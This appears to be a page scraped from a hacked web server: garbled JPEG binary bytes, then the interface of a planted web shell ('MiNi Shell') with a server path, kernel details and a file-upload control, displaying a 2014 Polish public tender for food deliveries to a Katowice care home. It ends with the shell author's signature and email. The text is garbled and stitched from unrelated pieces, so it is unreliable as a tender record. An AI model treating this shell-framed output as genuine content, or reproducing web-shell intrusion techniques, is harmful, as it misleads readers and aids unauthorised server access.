JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141204/398148-N-2014.html

<p class="kh_header"><b>Katowice: Dostawa żywności na potrzeby Domu Pomocy Społecznej Zacisze
z  podziałem na 8 pakietów części</b><br>
<b>Numer ogłoszenia: 398148 - 2014; data zamieszczenia: 04.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej ZACISZE , ul. Traktorzystów 42, 40-695 Katowice, woj. śląskie, tel. 32 2025432, faks 32 2028791.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: JEDNOSTKA SAMORZĄDU TERYTORIALNEGO.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności na potrzeby Domu Pomocy Społecznej Zacisze
z  podziałem na 8 pakietów części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dżem truskawkowy  250g.-300g. 	350 szt.
 Dżem czarna porzeczka  250g.-300g.	350 szt.
 Dżem brzoskwiniowy  250g.-300g.	200 szt.
 Dżem morelowy  250g.-300g.	200 szt.
 Dżem ananasowy  250g.-300g.	150 szt.
 Powidła śliwkowe  ok.310g.	 25 szt.
 Jogurt naturalny Ca  150g.-175g. 	1500 szt.
 Jogurt naturalny  300g.-400g.	250 szt
 Jogurt owocowy 150g.	1500 szt.
 Kefir  200g.-250g.	2300 szt.
 Masło  82% tł. 200g.	5700 szt.
 Mleko  2%   0,9 l  - folia	11000 szt.
 Mleko  2%   1,0   -  karton	200 szt.
 Mleko zagęszczone niesł. 500g  4%tł.	200 szt.
 Margaryna mleczna  250g.	1000 szt.
 Olej  1,0 l  rzepakowy	130 l
 Olej  0,5 l  rzepakowy	15 l
 Pasztet  drobiowy  50g.	2000 szt.
 Ser żółty typu szwajcar 45% tł.	80 kg.
 Ser topiony  50g.	7000 szt.
 Ser naturalny typu bieluch  150g.	1500 szt.
Serek do chleba  100g. 	300 szt.
 Śmietana  18%  180g.	1000 szt.
 Twaróg półtłusty 	500 kg.
 Ser homog.owocowy 140g. -150g	3500 szt.
 Twaróg ziarnisty - lekki 150g.	720 szt.
 Ser domowy smażony chudy	100 kg.
 Sok marchwiowy 1.0 l  	180 szt.
 Kaszka manna z owocami  150g.	200 szt.
 Deser ryżowy  150g.	100 szt
 Serniczek toruński 150g.	700 szt.
 Ser pleśniowy camembert  120g.	80 szt.
 Masło roślinne kubek 250g.	60 szt.
 Dżem  25g.	800 szt.
Bułka tarta	60 kg.
Bułka pszenna 50 g.	15600 szt.
Baton 400 g.	5 szt.
Chleb mieszany 1.20 kg.	5720 szt.
Chałki 350 g	3100 szt.
Chleb razowy 800 g.	1400 szt.
Ciasto jogurtowe	70 kg.
Pączki  80g.	200 szt.
Budyń 40g.	 1500 szt.
Bazylia 20g.	50 szt.
Zioła prowansalskie 20g.	50 szt. 
Tymianek 20g.	50 szt.
Biszkopty 100g.	600 szt.
Cynamon  15g.	150 szt.
Cukier	1600 szt.
Cukier puder	12 kg.
Ciastka w czekoladzie	42 kg.
Ciastka kruche	20 kg.
Krakersy	10 kg.
Cukier waniliowy 16g.	150 szt.
Czekolada mleczna 100g.	80 szt.
Czekolada b  c 100g.	300 szt.
Ciastka b  c  70-125g	1200 szt.
Przyprawa do piernika 20g.	20szt.
Soda oczyszczona	30 szt.
Gałka muszkatołowa 10g.	10 szt.
Galaretka owocowa 75g.	160 szt.
Herbata expresowa 50szt.	220 szt.
Herbata liściasta 100g.	1000 szt.
Imbir 20g.	15 szt.
Kminek 20 g.	100 szt.
Kasza jęczmienna średnia	150 kg.
Kasza gryczana	80 kg.
Kasza manna	150 kg.
Kawa inka 150 g.	450 szt.
Kleik ryżowy 160 g.	80 szt.
Kisiel 40 g.	120 g.
Kawa nesca 200 g.	20 szt.
Liść laurowy 10 g.	60 szt.
Makaron nitki-tradycyjny	170 kg.
Makaron gwiazdka	100 kg.
Makaron świderki dur.20%	200 kg.
Mąka pszenna	350 kg.
Musztarda 210 g.	500 szt.
Majeranek 10 g.	100 szt.
Majonez  250g. 	60 szt.
Mąka ziemniaczana	150 kg.
Maggi  1.0 l	60 szt.
Miód  25 g.	5250 szt.
Miód sztuczny  250g.	10 szt.
Napój kakaowy  300g.	200 szt.
Kakao naturalne  100 g.	60 szt.
Ocet spirytusowy  500 ml	30 szt.
Pieprz ziołowy  20g.	50 szt.
Pieprz mielony czarny 20 g.	250 szt.
Płatki kukurydziane 250gr.	200 szt.
Płatki owsiane  500gr.	250 szt.
Pierniki w czekoladzie	50 kg.
Proszek do pieczenia 30gr.	200 szt.
Papryka mielona słodka 20g.	130 szt.
Ryż	350 kg.
Sól	220 kg.
Suchary bc  285 g.	100 szt.
Przyprawa do potraw 200g.	65 szt.
Wafle w czekoladzie	42 kg.
Wafle	42 kg.
Wafle ryżowe  120 g.	200 szt.
Ziele angielskie 15g.	100 szt.
Żelatyna  50 g.	160 szt.
Boczek wędzony	72 kg.
Flaki wołowe - krojone	125 kg.
Golonka wieprzowe tylne	80 kg.
Nogi wieprzowe	80 kg.
Łopatka wieprzowa bk	320 kg.
Wołowe z kością - szponder	100 kg.
Wołowe gulaszowe	200 kg.
Pręga wołowa	70 kg.
Karczek wieprzowy bk	200 kg.
Żeberka wieprzowe	140 kg.
Słonina 	10 kg.
Ozorki wieprzowe	30 kg.
Schab wieprzowy bk	50 kg.
Wędlina podwawelska	450 kg.
Parówkowa	270 kg.
Parówka cienka 	100 kg.
Mortadela wieprzowa	120 kg.
Wędlina szynkowa wieprzowa	210 kg.
Szynka gotowana wp. np. Jaguni	150 kg.
Szynka biała wp.	60 kg.
Pieczeń rzymska wp.	100 kg.
Polędwica z kurczaka	90 kg.
Łopatka w galarecie	65 kg.
Polędwica sopocka	180 kg.
Krupniok	160 kg.
Szynka z indyka tostowa	100 kg.
Szynka drobiowa	140 kg.
Salceson drobiowy	40 kg.
Kiełbasa biała	80 kg.
Pasztet delikatesowy	80 kg.
Mielonka wieprzowa	120 kg.
Salceson ozorkowy	40 kg.
Krakowska	100 kg.
Śląska	80 kg.
Wędlina kminkowa	100 kg.
Kurczaki	755 kg.
Filet z kurczaka	325 kg.
Udziec z kurczaka	300 kg.
Podudzie-pałka z kurczaka	 325 kg.
Filet z indyka	25 kg.
Skrzydła z kurczaka	260 kg.
Wątroba drobiowa	110 kg.
 Brukselka                          1.0 kg.	20 kg
 Brokuły                             1.0 kg.	190 kg.
 Barszcz ukraiński              1.0 kg.	30 kg.
 Fasola szparagowa            1.0 kg.	100 kg.
 Marchew kostka                1.0 kg.	20 kg.
 Mieszanka 7- składnikowa  1.0 kg.	80 kg.
 Szpinak                            1.0 kg.	120 kg.
 Kalafior                             1.0 kg.	20 kg.
 Włoszczyzna paski           1.0 kg.	160 kg.
 Paprykarz                         1.0 kg.	90 kg.
 Mieszanka kompotowa      1.0 kg.	900 kg.
 Wiśnia drylowana              1.0 kg.	60 kg.
 Truskawka mrożona          1.0 kg.	70 kg.
 Śliwka drylowana              1.0 kg.	60 kg.
 Placki ziemniaczane  25 szt.  1,5 kg.	120 pacz.
 Pierogi z mięsem             1.0 kg.	130 kg.
 Kluski śląskie                  1.0 kg.	120 kg.
 Uszka z mięsem              1.0 kg	120 kg.
 Pierogi z serem                1.0 kg.	60 kg.
 Makrela wędzona  - 1.0 kg.	160 kg.
 Miruna bs SHP - 1.0kg	40 kg.
 Dorsz atlantycki czerniak SHP -1.0 kg.	130 kg.
 Filet śledziowy ala matjas - 1.0 kg.	80 kg.
 Filet śledziowy opiekany   -  1.0 kg.	180 kg.
 Paluszki rybne  - złote -  300 g. 	40 szt.
 Filet śledziowy w pomidorach - 125 g.	700 szt.
 Filet z makreli w pomidorach  -  125 g.	700 szt.
 Tuńczyk w kawał. w oleju Laguna -170g.	380 szt.
 Filet śledziowy w oleju  - 125 g.	200 szt.
 Filet z makreli  w oleju  - 125 g.	200 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-5, 15.33.22.90-3, 15.40.00.00-2, 15.81.10.00-6, 15.80.00.00-6, 15.11.00.00-2, 15.13.11.30-5, 15.11.20.00-6, 15.33.11.00-8, 15.20.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości odpowiednio do pakietu tj.
pakiet nr 1  2471,43 zł (dwa tysiące czterysta siedemdziesiąt jeden zł 43 100)
pakiet nr 2  857,14 zł (osiemset pięćdziesiąt siedem zł 14 100) pakiet nr 3  756,10 zł (siedemset pięćdziesiąt sześć zł 10 100) pakiet nr 4  571,43 zł (pięćset siedemdziesiąt jeden zł 43 100 pakiet nr 5  928,57 zł (dziewięćset dwadzieścia osiem zł 57 100 ) pakiet nr 6  485,71 zł (czterysta osiemdziesiąt pięć zł 71 100) pakiet nr 7  485,71 zł (czterysta osiemdziesiąt pięć zł 71 100) pakiet nr 8  471,43 zł ( czterysta siedemdziesiąt jeden zł 43 100)
8.2 Termin wniesienia wadium upływa dnia 11.12.2014r. o godzinie 09 00. Wadium musi obejmować okres związania ofertą. 
8.3 O uznaniu przez Zamawiającego, że wadium w pieniądzu wniesiono w wymaganym terminie, decyduje data wpływu środków na rachunek Zamawiającego.
8.4 Wadium może być wnoszone
8.4.1 W pieniądzu przelewem na konto
Konto bankowe ING Bank Śląski  O Katowice 
nr konta 02 1050 1214 1000 0022 9013 2824
z adnotacją wadium na przetarg nieograniczony na zakup wraz z dostawą żywności pakiet nr termin 11.12.2014.
8.4.2 W poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, w gwarancjach bankowych, w gwarancjach ubezpieczeniowych, w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu  Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42 poz. 275 z późn. zm.) w kasie Zamawiającego - w godzinach od 08 00 do 14 00.
8.4.2.1 W przypadku gwarancji bankowej lub ubezpieczeniowej niezbędne jest przedłożenie pisemnej bezwarunkowej gwarancji udzielonej przez bank lub firmę ubezpieczeniową (oświadczenie), zgodnie z wymaganiami określonymi przez prawo bankowe.
8.4.2.2 W przypadku poręczenia niezbędne jest złożenie przez poręczyciela oświadczenia pisemnego wobec wierzyciela (Zamawiającego).
8.4.2.3 Złożone poręczenie gwarancja musi zawierać
8.4.2.3.1 Termin obowiązywania gwarancji poręczenia do końca okresu związania z  ofertą na kwotę odpowiednio do pakietu .
8.4.2.3.2 Informacje, że udzielona gwarancji poręczenie stanowi zabezpieczenie na wadium na rzecz Zamawiającego dotyczące przetargu nr 341-1 14,
8.4.2.3.3 Zobowiązanie zgodnie z art. 46 ust. 4a ustawy - Prawo zamówień publicznych
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie,  nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1,  
pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt.3 , co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
8.4.2.3.4 Zobowiązanie zgodne z art. 46 ust. 5 ustawy - Prawo zamówień publicznych Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8.5 Kserokopię dowodu wniesienia wadium należy dołączyć do ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków zostanie dokonana na podstawie przedłożonych 
i określonych w punkcie 6 SIWZ dokumentów i oświadczeń według formuły spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków zostanie dokonana na podstawie przedłożonych 
i określonych w punkcie 6 SIWZ dokumentów i oświadczeń według formuły spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków zostanie dokonana na podstawie przedłożonych 
i określonych w punkcie 6 SIWZ dokumentów i oświadczeń według formuły spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków zostanie dokonana na podstawie przedłożonych 
i określonych w punkcie 6 SIWZ dokumentów i oświadczeń według formuły spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków zostanie dokonana na podstawie przedłożonych 
i określonych w punkcie 6 SIWZ dokumentów i oświadczeń według formuły spełnia  nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz ofertowy ( według załączonego wzoru - zał. 1a, pełnomocnictwo podmiotów występujących wspólnie ( jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.biuletyn.abip.pl/dpszacisze<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Zacisze
ul Traktorzystów 42
40-695 Katowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2014 godzina 09:00, miejsce: Dom Pomocy Społecznej Zacisze
ul Traktorzystów 42
40-695 Katowice
pok. 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com